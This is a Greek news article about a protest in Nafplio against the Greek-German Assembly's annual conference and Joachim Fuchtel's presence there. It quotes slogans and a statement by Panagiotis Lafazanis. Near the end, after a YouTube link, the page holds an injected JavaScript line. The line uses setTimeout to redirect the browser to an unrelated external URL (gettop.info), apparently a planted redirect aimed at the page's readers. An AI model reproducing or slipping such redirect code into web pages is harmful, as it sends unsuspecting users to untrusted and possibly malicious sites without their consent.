Λαφαζάνης – Μακρή: Μαζί, μαζί, να φύγουν οι Ναζί (BINTEO)

0
12

 

Στο Ναύπλιο πραγματοποιήθηκε συγκέντρωση διαμαρτυρίας κατά της 6ης Ετήσιας Συνδιάσκεψης της Ελληνογερμανικής Συνέλευσης.

Παρόντες ήταν ο Παναγιώτης Λαφαζάνης, ο Στάθης Λεουτσάκος, η Ραχήλ Μακρή, ο Θανασης Πετράκος και ο Κώστας Ήσυχος οι οποίοι εξέφρασαν την αντίθεσή τους στη σύνοδο και την παρουσία του Γιοακίμ Φούχτελ στο Ναύπλιο. Με συνθήμαια όπως «αέρα-αέρα, να φύγει η χολέρα», «Μαζί, μαζί, να φύγουν οι Ναζί», και πανό: «Απέλαση στους οικονομικούς δολοφόνους», «Έξω ο Φούχτελ από το Ναύπλιο» βροντοφώναξαν την αντίδρασή τους.

Ο κ. Λαφαζάνης τόνισε ότι η συγκεκριμένη συνάντηση είναι προσβολή του τοπικού βουλευτικού κόσμου: «Εδώ δεν μιλάμε για ελληνογερμανική συνεργασία. Εδώ είναι η αποικιοποίηση της Ελλάδας από τη Γερμανία. Εδώ μιλάμε ότι ο Γερμανός θέλει να φτωχοποιήσει την Ελλάδα, να την ληστέψει. Δεν θέλουμε μνημόνια. Δεν θέλουμε την Ελλάδα »μπανανία»». Να σταματήσει εδώ αυτή η Συνέλευση».

https://www.youtube.com/watch?v=M48v1rEuSWg setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here